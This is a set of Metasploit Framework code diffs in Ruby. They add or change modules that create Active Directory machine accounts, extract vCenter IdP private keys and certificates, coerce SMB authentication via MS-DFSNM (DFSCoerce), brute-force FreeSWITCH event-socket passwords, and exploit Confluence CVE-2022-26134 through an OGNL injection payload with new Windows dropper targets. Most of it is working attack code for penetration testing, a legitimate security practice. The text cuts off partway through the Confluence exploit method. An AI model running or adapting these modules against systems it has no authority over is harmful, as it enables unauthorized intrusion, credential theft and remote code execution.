which_fields: RubySMB::Dcerpc::Samr::USER_ALL_NTPASSWORDPRESENT | RubySMB::Dcerpc::Samr::USER_ALL_PASSWORDEXPIRED
|
||||
},
|
||||
user_password: {
|
||||
buffer: RubySMB::Dcerpc::Samr::SamprEncryptedUserPasswordNew.encrypt_password(
|
||||
password,
|
||||
@simple.client.application_key
|
||||
)
|
||||
}
|
||||
)
|
||||
)
|
||||
@samr.samr_set_information_user2(
|
||||
user_handle: user_handle,
|
||||
user_info: user_info
|
||||
)
|
||||
|
||||
user_info = RubySMB::Dcerpc::Samr::SamprUserInfoBuffer.new(
|
||||
tag: RubySMB::Dcerpc::Samr::USER_CONTROL_INFORMATION,
|
||||
member: RubySMB::Dcerpc::Samr::UserControlInformation.new(
|
||||
user_account_control: RubySMB::Dcerpc::Samr::USER_WORKSTATION_TRUST_ACCOUNT
|
||||
)
|
||||
)
|
||||
@samr.samr_set_information_user2(
|
||||
user_handle: user_handle,
|
||||
user_info: user_info
|
||||
)
|
||||
print_good("Successfully created #{@domain_name}\\#{computer_name} with password #{password}")
|
||||
report_creds(@domain_name, computer_name, password)
|
||||
end
|
||||
|
||||
def action_delete_computer
|
||||
fail_with(Failure::BadConfig, 'This action requires COMPUTER_NAME to be specified.') if datastore['COMPUTER_NAME'].blank?
|
||||
computer_name = datastore['COMPUTER_NAME']
|
||||
|
||||
details = @samr.samr_lookup_names_in_domain(domain_handle: @domain_handle, names: [ computer_name ])
|
||||
fail_with(Failure::BadConfig, 'The specified computer was not found.') if details.nil?
|
||||
details = details[computer_name]
|
||||
|
||||
handle = @samr.samr_open_user(domain_handle: @domain_handle, user_id: details[:rid])
|
||||
@samr.samr_delete_user(user_handle: handle)
|
||||
print_good('The specified computer has been deleted.')
|
||||
end
|
||||
|
||||
def action_lookup_computer
|
||||
fail_with(Failure::BadConfig, 'This action requires COMPUTER_NAME to be specified.') if datastore['COMPUTER_NAME'].blank?
|
||||
computer_name = datastore['COMPUTER_NAME']
|
||||
|
||||
details = @samr.samr_lookup_names_in_domain(domain_handle: @domain_handle, names: [ computer_name ])
|
||||
if details.nil?
|
||||
print_error('The specified computer was not found.')
|
||||
return
|
||||
end
|
||||
details = details[computer_name]
|
||||
sid = @samr.samr_rid_to_sid(object_handle: @domain_handle, rid: details[:rid]).to_s
|
||||
print_good("Found #{@domain_name}\\#{computer_name} (SID: #{sid})")
|
||||
end
|
||||
|
||||
def report_creds(domain, username, password)
|
||||
service_data = {
|
||||
address: datastore['RHOST'],
|
||||
port: datastore['RPORT'],
|
||||
service_name: 'smb',
|
||||
protocol: 'tcp',
|
||||
workspace_id: myworkspace_id
|
||||
}
|
||||
|
||||
credential_data = {
|
||||
module_fullname: fullname,
|
||||
origin_type: :service,
|
||||
private_data: password,
|
||||
private_type: :password,
|
||||
username: username,
|
||||
realm_key: Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN,
|
||||
realm_value: domain
|
||||
}.merge(service_data)
|
||||
|
||||
credential_core = create_credential(credential_data)
|
||||
|
||||
login_data = {
|
||||
core: credential_core,
|
||||
status: Metasploit::Model::Login::Status::UNTRIED
|
||||
}.merge(service_data)
|
||||
|
||||
create_credential_login(login_data)
|
||||
end
|
||||
end
|
||||
@@ -31,13 +31,13 @@ class MetasploitModule < Msf::Auxiliary
|
||||
'Targets' => [['WordPress', {}]],
|
||||
'DefaultTarget' => 0,
|
||||
'References' => [
|
||||
['URL', 'https://blog.nintechnet.com/critical-vulnerability-fixed-in-wordpress-automatic-plugin/'],
|
||||
['NOCVE', 'Patched in 3.53.3 without vendor disclosure']
|
||||
['URL', 'https://blog.nintechnet.com/critical-vulnerability-fixed-in-wordpress-automatic-plugin/']
|
||||
],
|
||||
'Notes' => {
|
||||
'Stability' => [CRASH_SAFE],
|
||||
'Reliability' => [],
|
||||
'SideEffects' => [CONFIG_CHANGES, IOC_IN_LOGS]
|
||||
'SideEffects' => [CONFIG_CHANGES, IOC_IN_LOGS],
|
||||
'NOCVE' => ['Patched in 3.53.3 without vendor disclosure']
|
||||
}
|
||||
)
|
||||
)
|
||||
|
||||
@@ -35,7 +35,9 @@ class MetasploitModule < Msf::Auxiliary
|
||||
],
|
||||
'Notes' =>
|
||||
{
|
||||
'SideEffects' => [CONFIG_CHANGES]
|
||||
'Stability' => [],
|
||||
'Reliability' => [],
|
||||
'SideEffects' => [CONFIG_CHANGES]
|
||||
},
|
||||
'DisclosureDate' => '2018-11-08'
|
||||
))
|
||||
|
||||
@@ -0,0 +1,209 @@
|
||||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'metasploit/framework/credential_collection'
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
include Msf::Auxiliary::Report
|
||||
|
||||
def initialize(info = {})
|
||||
super(
|
||||
update_info(
|
||||
info,
|
||||
'Name' => 'VMware vCenter Extract Secrets from vmdir / vmafd DB File',
|
||||
'Description' => %q{
|
||||
Grab certificates from the vCenter server vmdird and vmafd
|
||||
database files and adds them to loot. The vmdird MDB database file
|
||||
can be found on the live appliance under the path
|
||||
/storage/db/vmware-vmdir/data.mdb, and the DB vmafd is under path
|
||||
/storage/db/vmware-vmafd/afd.db. The vmdir database contains the
|
||||
IdP signing credential, and vmafd contains the vCenter certificate
|
||||
store. This module will accept either file from a live vCenter
|
||||
appliance, or from a vCenter appliance backup archive; either or
|
||||
both files can be supplied.
|
||||
},
|
||||
'Author' => 'npm[at]cesium137.io',
|
||||
'Platform' => [ 'linux' ],
|
||||
'DisclosureDate' => '2022-05-10',
|
||||
'License' => MSF_LICENSE,
|
||||
'References' => [
|
||||
['URL', 'https://www.horizon3.ai/compromising-vcenter-via-saml-certificates/']
|
||||
],
|
||||
'Actions' => [
|
||||
[
|
||||
'Dump',
|
||||
{
|
||||
'Description' => 'Dump secrets from vCenter files'
|
||||
}
|
||||
]
|
||||
],
|
||||
'DefaultAction' => 'Dump',
|
||||
'Notes' => {
|
||||
'Stability' => [ CRASH_SAFE ],
|
||||
'Reliability' => [ REPEATABLE_SESSION ],
|
||||
'SideEffects' => [ ARTIFACTS_ON_DISK ]
|
||||
}
|
||||
)
|
||||
)
|
||||
|
||||
register_options([
|
||||
OptPath.new('VMDIR_MDB', [ false, 'Path to the vmdir data.mdb file' ]),
|
||||
OptPath.new('VMAFD_DB', [ false, 'Path to the vmafd afd.db file' ]),
|
||||
OptString.new('VC_IP', [ false, '(Optional) IPv4 address to attach to loot' ])
|
||||
])
|
||||
|
||||
register_advanced_options([
|
||||
OptInt.new('MDB_CHUNK_SIZE', [ true, 'Block size to use when scanning MDB file', 4096 ]),
|
||||
OptInt.new('MDB_STARTING_OFFSET', [ true, 'Starting offset for MDB file binary scan', 0 ])
|
||||
])
|
||||
end
|
||||
|
||||
def loot_host
|
||||
datastore['VC_IP'] || '127.0.0.1'
|
||||
end
|
||||
|
||||
def vmdir_file
|
||||
datastore['VMDIR_MDB']
|
||||
end
|
||||
|
||||
def vmafd_file
|
||||
datastore['VMAFD_DB']
|
||||
end
|
||||
|
||||
def run
|
||||
unless vmdir_file || vmafd_file
|
||||
print_error('Please specify the path to at least one vCenter database file (VMDIR_MDB or VMAFD_DB)')
|
||||
return
|
||||
end
|
||||
if vmdir_file
|
||||
print_status("Extracting vmwSTSTenantCredential from #{vmdir_file} ...")
|
||||
extract_idp_cert
|
||||
end
|
||||
if vmafd_file
|
||||
print_status("Extracting vSphere platform certificates from #{vmafd_file} ...")
|
||||
extract_vmafd_certs
|
||||
end
|
||||
end
|
||||
|
||||
def extract_vmafd_certs
|
||||
db = SQLite3::Database.open(vmafd_file)
|
||||
db.results_as_hash = true
|
||||
unless (vecs_entry_alias = db.execute('SELECT DISTINCT Alias FROM CertTable WHERE PrivateKey NOT NULL;'))
|
||||
fail_with(Msf::Exploit::Failure::NoTarget, 'Empty Alias list returned from CertTable')
|
||||
end
|
||||
vecs_entry_alias.each do |vecs_alias|
|
||||
store_label = vecs_alias['Alias'].upcase
|
||||
unless (res = db.execute("SELECT PrivateKey, CertBlob FROM CertTable WHERE Alias = '#{store_label}';").first)
|
||||
fail_with(Msf::Exploit::Failure::NoTarget, "Could not extract CertTable Alias '#{store_label}'")
|
||||
end
|
||||
priv_pem = res['PrivateKey'].encode('utf-8').delete("\000")
|
||||
pub_pem = res['CertBlob'].encode('utf-8').delete("\000")
|
||||
begin
|
||||
key = OpenSSL::PKey::RSA.new(priv_pem)
|
||||
cert = OpenSSL::X509::Certificate.new(pub_pem)
|
||||
p = store_loot(store_label, 'PEM', loot_host, key.to_pem.to_s, "#{store_label}.key", "vCenter #{store_label} Private Key")
|
||||
print_good("#{store_label} key: #{p}")
|
||||
p = store_loot(store_label, 'PEM', loot_host, cert.to_pem.to_s, "#{store_label}.pem", "vCenter #{store_label} Certificate")
|
||||
print_good("#{store_label} cert: #{p}")
|
||||
rescue OpenSSL::PKey::PKeyError
|
||||
print_error("Could not extract #{store_label} private key")
|
||||
rescue OpenSSL::X509::CertificateError
|
||||
print_error("Could not extract #{store_label} certificate")
|
||||
end
|
||||
end
|
||||
rescue SQLite3::NotADatabaseException => e
|
||||
fail_with(Msf::Exploit::Failure::NoTarget, "Error opening SQLite3 database '#{vmafd_file}': #{e.message}")
|
||||
rescue SQLite3::SQLException => e
|
||||
fail_with(Msf::Exploit::Failure::NoTarget, "Error calling SQLite3: #{e.message}")
|
||||
end
|
||||
|
||||
def extract_idp_cert
|
||||
sts_pem = nil
|
||||
unless (bytes = read_mdb_sts_block(vmdir_file, datastore['MDB_CHUNK_SIZE'], datastore['MDB_STARTING_OFFSET']))
|
||||
fail_with(Msf::Exploit::Failure::NoTarget, "Invalid vmdird database '#{vmdir_file}': unable to locate TenantCredential-1 in binary stream")
|
||||
end
|
||||
idp_key = get_sts_key(bytes)
|
||||
idp_key_pem = idp_key.to_pem.to_s
|
||||
get_sts_pem(bytes).each do |stscert|
|
||||
idp_cert_pem = stscert.to_pem.to_s
|
||||
case stscert.check_private_key(idp_key)
|
||||
when true # Private key associates with public cert
|
||||
sts_pem = "#{idp_key_pem}#{idp_cert_pem}"
|
||||
p = store_loot('idp', 'PEM', loot_host, idp_key_pem, 'SSO_STS_IDP.key', 'vCenter SSO IdP private key')
|
||||
print_good("SSO_STS_IDP key: #{p}")
|
||||
p = store_loot('idp', 'PEM', loot_host, idp_cert_pem, 'SSO_STS_IDP.pem', 'vCenter SSO IdP certificate')
|
||||
print_good("SSO_STS_IDP cert: #{p}")
|
||||
when false # Private key does not associate with this cert (VMCA root)
|
||||
p = store_loot('vmca', 'PEM', loot_host, idp_cert_pem, 'VMCA_ROOT.pem', 'vCenter VMCA root certificate')
|
||||
print_good("VMCA_ROOT cert: #{p}")
|
||||
end
|
||||
end
|
||||
unless sts_pem # We were unable to link a public and private key together
|
||||
fail_with(Msf::Exploit::Failure::NoTarget, 'Unable to associate IdP certificate and private key')
|
||||
end
|
||||
end
|
||||
|
||||
def read_mdb_sts_block(file_name, chunk_size, offset)
|
||||
bytes = nil
|
||||
file = File.open(file_name, 'rb')
|
||||
while offset <= file.size - chunk_size
|
||||
buf = File.binread(file, chunk_size, offset + 1)
|
||||
if buf.match?(/cn=tenantcredential-1/i) && buf.match?(/[\x30\x82](.{2})[\x30\x82]/n) && buf.match?(/[\x30\x82](.{2})[\x02\x01\x00]/n)
|
||||
target_offset = offset + buf.index(/cn=tenantcredential-1/i) + 1
|
||||
bytes = File.binread(file, chunk_size * 2, target_offset)
|
||||
break
|
||||
end
|
||||
offset += chunk_size
|
||||
end
|
||||
bytes
|
||||
rescue StandardError => e
|
||||
fail_with(Msf::Exploit::Failure::Unknown, "Exception in #{__method__}: #{e.message}")
|
||||
ensure
|
||||
file.close
|
||||
end
|
||||
|
||||
def read_der(bytes)
|
||||
der_len = (bytes[2..3].unpack('H*').first.to_i(16) + 4).to_i
|
||||
unless der_len <= bytes.length - 1
|
||||
fail_with(Msf::Exploit::Failure::Unknown, 'Malformed DER: byte length exceeds working buffer size')
|
||||
end
|
||||
bytes[0..der_len - 1]
|
||||
end
|
||||
|
||||
def get_sts_key(bytes)
|
||||
working_offset = bytes.unpack('H*').first.index(/3082[0-9a-f]{4}020100/) / 2 # PKCS1 magic bytes
|
||||
byte_len = bytes.length - working_offset
|
||||
key_bytes = read_der(bytes[working_offset, byte_len])
|
||||
key_b64 = Base64.strict_encode64(key_bytes).scan(/.{1,64}/).join("\n")
|
||||
key_pem = "-----BEGIN PRIVATE KEY-----\n#{key_b64}\n-----END PRIVATE KEY-----"
|
||||
vprint_status("key_pem:\n#{key_pem}")
|
||||
OpenSSL::PKey::RSA.new(key_pem)
|
||||
rescue OpenSSL::PKey::PKeyError
|
||||
# fail_with(Msf::Exploit::Failure::NoTarget, 'Failure during extract of PKCS#1 RSA private key')
|
||||
print_error('Failure during extract of PKCS#1 RSA private key')
|
||||
end
|
||||
|
||||
def get_sts_pem(bytes)
|
||||
idp_certs = []
|
||||
working_offset = bytes.unpack('H*').first.index(/3082[0-9a-f]{4}3082/) / 2 # x509v3 magic bytes
|
||||
byte_len = bytes.length - working_offset
|
||||
working_bytes = bytes[working_offset, byte_len]
|
||||
[4, 8].each do |offset|
|
||||
der_bytes = read_der(working_bytes)
|
||||
der_b64 = Base64.strict_encode64(der_bytes).scan(/.{1,64}/).join("\n")
|
||||
der_pem = "-----BEGIN CERTIFICATE-----\n#{der_b64}\n-----END CERTIFICATE-----"
|
||||
vprint_status("der_pem:\n#{der_pem}")
|
||||
idp_certs << OpenSSL::X509::Certificate.new(der_pem)
|
||||
next_offset = working_offset + der_bytes.length + offset - 1
|
||||
working_offset = next_offset
|
||||
byte_len = bytes.length - working_offset
|
||||
working_bytes = bytes[working_offset, byte_len]
|
||||
end
|
||||
idp_certs
|
||||
rescue OpenSSL::X509::CertificateError
|
||||
# fail_with(Msf::Exploit::Failure::NoTarget, 'Failure during extract of x509v3 certificate')
|
||||
print_error('Failure during extract of x509v3 certificate')
|
||||
end
|
||||
end
|
||||
@@ -54,12 +54,13 @@ class MetasploitModule < Msf::Auxiliary
|
||||
def enumerate_keys
|
||||
keys = []
|
||||
enumerate_slab_ids.each do |sid|
|
||||
sock.send("stats cachedump #{sid} #{max_keys}\r\n", 0)
|
||||
loop do
|
||||
sock.send("stats cachedump #{sid} #{max_keys}\r\n", 0)
|
||||
data = sock.recv(4096)
|
||||
break if !data || data.length == 0 || data == "END\r\n"
|
||||
break if !data || data.length == 0 || data == "END\r\n" || data == "ERROR\r\n"
|
||||
matches = data.scan(/^ITEM (?<key>.*) \[/)
|
||||
keys = keys + matches.flatten! if matches
|
||||
break if matches.empty?
|
||||
keys = keys + matches.flatten!
|
||||
break if data =~ /^END/
|
||||
end
|
||||
end
|
||||
@@ -86,9 +87,10 @@ class MetasploitModule < Msf::Auxiliary
|
||||
sock.send("lru_crawler metadump all\r\n", 0)
|
||||
loop do
|
||||
data = sock.recv(4096)
|
||||
break if !data || data.length == 0 || data == "END\r\n"
|
||||
break if !data || data.length == 0 || data == "END\r\n" || data == "ERROR\r\n"
|
||||
matches = data.scan(/^key=(?<key>.*) exp=/)
|
||||
keys = keys + matches.flatten! if matches
|
||||
break if matches.empty?
|
||||
keys = keys + matches.flatten!
|
||||
break if data =~ /^END/
|
||||
data = ''
|
||||
end
|
||||
|
||||
@@ -0,0 +1,108 @@
|
||||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'windows_error'
|
||||
require 'ruby_smb'
|
||||
require 'ruby_smb/error'
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
include Msf::Exploit::Remote::DCERPC
|
||||
include Msf::Exploit::Remote::SMB::Client::Authenticated
|
||||
include Msf::Auxiliary::Scanner
|
||||
|
||||
Dfsnm = RubySMB::Dcerpc::Dfsnm
|
||||
|
||||
METHODS = %w[NetrDfsAddStdRoot NetrDfsRemoveStdRoot].freeze
|
||||
|
||||
def initialize
|
||||
super(
|
||||
'Name' => 'DFSCoerce',
|
||||
'Description' => %q{
|
||||
Coerce an authentication attempt over SMB to other machines via MS-DFSNM methods.
|
||||
},
|
||||
'Author' => [
|
||||
'Wh04m1001',
|
||||
'xct_de',
|
||||
'Spencer McIntyre'
|
||||
],
|
||||
'References' => [
|
||||
[ 'URL', 'https://github.com/Wh04m1001/DFSCoerce' ]
|
||||
],
|
||||
'License' => MSF_LICENSE
|
||||
)
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('LISTENER', [ true, 'The host listening for the incoming connection', Rex::Socket.source_address ]),
|
||||
OptEnum.new('METHOD', [ true, 'The RPC method to use for triggering', 'Automatic', ['Automatic'] + METHODS ])
|
||||
]
|
||||
)
|
||||
end
|
||||
|
||||
def connect_dfsnm
|
||||
vprint_status('Connecting to Distributed File System (DFS) Namespace Management Protocol')
|
||||
netdfs = @tree.open_file(filename: 'netdfs', write: true, read: true)
|
||||
|
||||
vprint_status('Binding to \\netdfs...')
|
||||
netdfs.bind(endpoint: RubySMB::Dcerpc::Dfsnm)
|
||||
vprint_good('Bound to \\netdfs')
|
||||
|
||||
netdfs
|
||||
end
|
||||
|
||||
def run_host(_ip)
|
||||
begin
|
||||
connect
|
||||
rescue Rex::ConnectionError => e
|
||||
fail_with(Failure::Unreachable, e.message)
|
||||
end
|
||||
|
||||
begin
|
||||
smb_login
|
||||
rescue Rex::Proto::SMB::Exceptions::Error, RubySMB::Error::RubySMBError => e
|
||||
fail_with(Failure::NoAccess, "Unable to authenticate ([#{e.class}] #{e}).")
|
||||
end
|
||||
|
||||
begin
|
||||
@tree = simple.client.tree_connect("\\\\#{sock.peerhost}\\IPC$")
|
||||
rescue RubySMB::Error::RubySMBError => e
|
||||
fail_with(Failure::Unreachable, "Unable to connect to the remote IPC$ share ([#{e.class}] #{e}).")
|
||||
end
|
||||
|
||||
begin
|
||||
dfsnm = connect_dfsnm
|
||||
rescue RubySMB::Error::UnexpectedStatusCode => e
|
||||
if e.status_code == ::WindowsError::NTStatus::STATUS_ACCESS_DENIED
|
||||
fail_with(Failure::NoAccess, 'Connection failed (STATUS_ACCESS_DENIED)')
|
||||
end
|
||||
|
||||
fail_with(Failure::UnexpectedReply, "Connection failed (#{e.status_code.name})")
|
||||
rescue RubySMB::Dcerpc::Error::FaultError => e
|
||||
elog(e.message, error: e)
|
||||
fail_with(Failure::UnexpectedReply, "Connection failed (DCERPC fault: #{e.status_name})")
|
||||
end
|
||||
|
||||
begin
|
||||
case datastore['METHOD']
|
||||
when 'NetrDfsAddStdRoot'
|
||||
dfsnm.netr_dfs_add_std_root(datastore['LISTENER'], 'share', comment: Faker::Hacker.say_something_smart)
|
||||
when 'NetrDfsRemoveStdRoot', 'Automatic'
|
||||
# use this technique by default, it's the original and doesn't require a comment
|
||||
dfsnm.netr_dfs_remove_std_root(datastore['LISTENER'], 'share')
|
||||
end
|
||||
rescue RubySMB::Dcerpc::Error::DfsnmError => e
|
||||
case e.status_code
|
||||
when ::WindowsError::Win32::ERROR_ACCESS_DENIED
|
||||
# this should be the response even if LISTENER captured the credentials (MSF, Responder, etc.)
|
||||
print_good('Server responded with ERROR_ACCESS_DENIED which indicates that the attack was successful')
|
||||
when ::WindowsError::Win32::ERROR_BAD_NETPATH
|
||||
# this should be the response even if LISTENER was inaccessible
|
||||
print_good('Server responded with ERROR_BAD_NETPATH which indicates that the attack was successful')
|
||||
else
|
||||
print_status("Server responded with #{e.status_code.name} (#{e.status_code.description})")
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
@@ -66,8 +66,17 @@ class MetasploitModule < Msf::Auxiliary
|
||||
end
|
||||
|
||||
def run_host(_ip)
|
||||
connect
|
||||
smb_login
|
||||
begin
|
||||
connect
|
||||
rescue Rex::ConnectionError => e
|
||||
fail_with(Failure::Unreachable, e.message)
|
||||
end
|
||||
|
||||
begin
|
||||
smb_login
|
||||
rescue Rex::Proto::SMB::Exceptions::Error, RubySMB::Error::RubySMBError => e
|
||||
fail_with(Failure::NoAccess, "Unable to authenticate ([#{e.class}] #{e}).")
|
||||
end
|
||||
|
||||
handle_args = PIPE_HANDLES[datastore['PIPE'].to_sym]
|
||||
fail_with(Failure::BadConfig, "Invalid pipe: #{datastore['PIPE']}") unless handle_args
|
||||
|
||||
@@ -0,0 +1,117 @@
|
||||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'metasploit/framework/credential_collection'
|
||||
require 'metasploit/framework/login_scanner/freeswitch_event_socket'
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
include Msf::Auxiliary::Scanner
|
||||
include Msf::Auxiliary::Report
|
||||
include Msf::Auxiliary::AuthBrute
|
||||
prepend Msf::Exploit::Remote::AutoCheck
|
||||
|
||||
def initialize(info = {})
|
||||
super(
|
||||
update_info(
|
||||
info,
|
||||
'Name' => 'FreeSWITCH Event Socket Login',
|
||||
'Description' => %q{
|
||||
This module tests FreeSWITCH Event Socket logins on a range of
|
||||
machines and report successful attempts.
|
||||
},
|
||||
'Author' => [
|
||||
'krastanoel'
|
||||
],
|
||||
'References' => [
|
||||
['URL', 'https://freeswitch.org/confluence/display/FREESWITCH/mod_event_socket']
|
||||
],
|
||||
'DefaultOptions' => { 'VERBOSE' => false },
|
||||
'License' => MSF_LICENSE,
|
||||
'Notes' => {
|
||||
'Stability' => [CRASH_SERVICE_RESTARTS],
|
||||
'Reliability' => [],
|
||||
'SideEffects' => []
|
||||
}
|
||||
)
|
||||
)
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(8021),
|
||||
OptString.new('PASSWORD', [false, 'FreeSWITCH event socket default password', 'ClueCon']),
|
||||
OptPath.new('PASS_FILE',
|
||||
[
|
||||
false,
|
||||
'The file that contains a list of of probable passwords.',
|
||||
File.join(Msf::Config.install_root, 'data', 'wordlists', 'unix_passwords.txt')
|
||||
])
|
||||
]
|
||||
)
|
||||
|
||||
# freeswitch does not have an username, there's only password
|
||||
deregister_options(
|
||||
'DB_ALL_CREDS', 'DB_ALL_USERS', 'DB_SKIP_EXISTING', 'BLANK_PASSWORDS',
|
||||
'USERNAME', 'USER_AS_PASS', 'USERPASS_FILE', 'USER_FILE',
|
||||
'PASSWORD_SPRAY', 'STOP_ON_SUCCESS'
|
||||
)
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
cred_collection = Metasploit::Framework::PrivateCredentialCollection.new(
|
||||
password: datastore['PASSWORD'],
|
||||
pass_file: datastore['PASS_FILE']
|
||||
)
|
||||
cred_collection = prepend_db_passwords(cred_collection)
|
||||
|
||||
scanner = Metasploit::Framework::LoginScanner::FreeswitchEventSocket.new(
|
||||
host: ip,
|
||||
port: rport,
|
||||
cred_details: cred_collection,
|
||||
stop_on_success: true, # this will have no effect due to the scanner behaviour when scanning without username
|
||||
connection_timeout: 10
|
||||
)
|
||||
|
||||
scanner.scan! do |result|
|
||||
credential_data = result.to_h
|
||||
credential_data.merge!(
|
||||
module_fullname: fullname,
|
||||
workspace_id: myworkspace_id
|
||||
)
|
||||
|
||||
if result.success?
|
||||
credential_data.delete(:username) # This service uses no username
|
||||
credential_core = create_credential(credential_data)
|
||||
credential_data[:core] = credential_core
|
||||
create_credential_login(credential_data)
|
||||
|
||||
if datastore['VERBOSE']
|
||||
vprint_good("Login Successful: #{result.credential.private} (#{result.status}: #{result.proof&.strip})")
|
||||
else
|
||||
print_good("Login Successful: #{result.credential.private}")
|
||||
end
|
||||
else
|
||||
invalidate_login(credential_data)
|
||||
vprint_error("LOGIN FAILED: #{result.credential.private} (#{result.status}: #{result.proof&.strip})")
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
def check_host(_ip)
|
||||
connect
|
||||
banner = sock.get
|
||||
disconnect(sock)
|
||||
|
||||
if banner.include?('Access Denied, go away.') || banner.include?('text/rude-rejection')
|
||||
return Exploit::CheckCode::Safe('Access denied by network ACL')
|
||||
end
|
||||
|
||||
unless banner.include?('Content-Type: auth/request')
|
||||
return Exploit::CheckCode::Unknown('Unable to determine the service fingerprint')
|
||||
end
|
||||
|
||||
return Exploit::CheckCode::Appears
|
||||
end
|
||||
end
|
||||
@@ -62,10 +62,10 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
'DisclosureDate' => '2022-02-02',
|
||||
'DefaultTarget' => 0,
|
||||
'Notes' => {
|
||||
'Stability' => CRASH_SERVICE_RESTARTS,
|
||||
'Stability' => [CRASH_SERVICE_RESTARTS],
|
||||
# repeatable... but only works 65% of the time, see comments above
|
||||
'Reliability' => REPEATABLE_SESSION,
|
||||
'SideEffects' => nil
|
||||
'Reliability' => [REPEATABLE_SESSION],
|
||||
'SideEffects' => []
|
||||
}
|
||||
)
|
||||
)
|
||||
|
||||
@@ -29,7 +29,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2014-4880' ],
|
||||
[ 'URL', 'https://www.rapid7.com/blog/post/2014/11/19/r7-2014-18-hikvision-dvr-devices--multiple-vulnerabilities' ]
|
||||
[ 'URL', 'https://www.rapid7.com/blog/post/2014/11/19/r7-2014-18-hikvision-dvr-devices-multiple-vulnerabilities' ]
|
||||
],
|
||||
'Platform' => 'linux',
|
||||
'Arch' => ARCH_ARMLE,
|
||||
|
||||
@@ -27,7 +27,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
'Spencer McIntyre'
|
||||
],
|
||||
'References' => [
|
||||
['CVE', '2021-26084'],
|
||||
['CVE', '2022-26134'],
|
||||
['URL', 'https://jira.atlassian.com/browse/CONFSERVER-79000?src=confmacro'],
|
||||
['URL', 'https://gist.githubusercontent.com/bturner-r7/1d0b62fac85235b94f1c95cc4c03fcf3/raw/478e53b6f68b5150eefd53e0956f23d53618d250/confluence-exploit.py'],
|
||||
['URL', 'https://github.com/jbaines-r7/through_the_wire'],
|
||||
@@ -35,7 +35,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
],
|
||||
'DisclosureDate' => '2022-06-02',
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => ['unix', 'linux'],
|
||||
'Platform' => ['unix', 'linux', 'win'],
|
||||
'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
|
||||
'Privileged' => false,
|
||||
'Targets' => [
|
||||
@@ -54,6 +54,22 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
'Arch' => [ARCH_X86, ARCH_X64],
|
||||
'Type' => :dropper
|
||||
}
|
||||
],
|
||||
[
|
||||
'Windows Command',
|
||||
{
|
||||
'Platform' => 'win',
|
||||
'Arch' => ARCH_CMD,
|
||||
'Type' => :cmd
|
||||
}
|
||||
],
|
||||
[
|
||||
'Windows Dropper',
|
||||
{
|
||||
'Platform' => 'win',
|
||||
'Arch' => [ARCH_X86, ARCH_X64],
|
||||
'Type' => :dropper
|
||||
}
|
||||
]
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
@@ -74,22 +90,45 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
end
|
||||
|
||||
def check
|
||||
version = get_confluence_version
|
||||
return CheckCode::Unknown unless version
|
||||
confluence_version = get_confluence_version
|
||||
return CheckCode::Unknown unless confluence_version
|
||||
|
||||
vprint_status("Detected Confluence version: #{version}")
|
||||
header = "X-#{Rex::Text.rand_text_alphanumeric(10..15)}"
|
||||
res = inject_ognl('', header: header) # empty command works for testing, the header will be set
|
||||
vprint_status("Detected Confluence version: #{confluence_version}")
|
||||
|
||||
return CheckCode::Unknown unless res
|
||||
|
||||
unless res && res.headers.include?(header)
|
||||
confluence_platform = get_confluence_platform
|
||||
unless confluence_platform
|
||||
return CheckCode::Safe('Failed to test OGNL injection.')
|
||||
end
|
||||
|
||||
vprint_status("Detected target platform: #{confluence_platform}")
|
||||
CheckCode::Vulnerable('Successfully tested OGNL injection.')
|
||||
end
|
||||
|
||||
def get_confluence_platform
|
||||
# this method gets the platform by exploiting CVE-2022-26134
|
||||
return @confluence_platform if @confluence_platform
|
||||
|
||||
header = "X-#{Rex::Text.rand_text_alphanumeric(10..15)}"
|
||||
ognl = <<~OGNL.gsub(/^\s+/, '').tr("\n", '')
|
||||
${
|
||||
Class.forName("com.opensymphony.webwork.ServletActionContext")
|
||||
.getMethod("getResponse",null)
|
||||
.invoke(null,null)
|
||||
.setHeader(
|
||||
"#{header}",
|
||||
Class.forName("javax.script.ScriptEngineManager")
|
||||
.newInstance()
|
||||
.getEngineByName("js")
|
||||
.eval("java.lang.System.getProperty('os.name')")
|
||||
)
|
||||
}
|
||||
OGNL
|
||||
res = inject_ognl(ognl)
|
||||
return nil unless res
|
||||
|
||||
res.headers[header]
|
||||
end
|
||||
|
||||
def get_confluence_version
|
||||
return @confluence_version if @confluence_version
|
||||
|
||||
@@ -107,6 +146,15 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
end
|
||||
|
||||
def exploit
|
||||
confluence_platform = get_confluence_platform
|
||||
unless confluence_platform
|
||||
fail_with(Failure::NotVulnerable, 'The target is not vulnerable.')
|
||||
end
|
||||
|
||||
unless confluence_platform.downcase.start_with?('win') == (target['Platform'] == 'win')
|
||||
fail_with(Failure::NoTarget, "The target platform '#{confluence_platform}' is incompatible with '#{target.name}'")
|
||||
end
|
||||
|
||||
print_status("Executing #{payload_instance.refname} (#{target.name})")
|
||||
|
||||
case target['Type']
|
||||
@@ -119,26 +167,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
|
||||
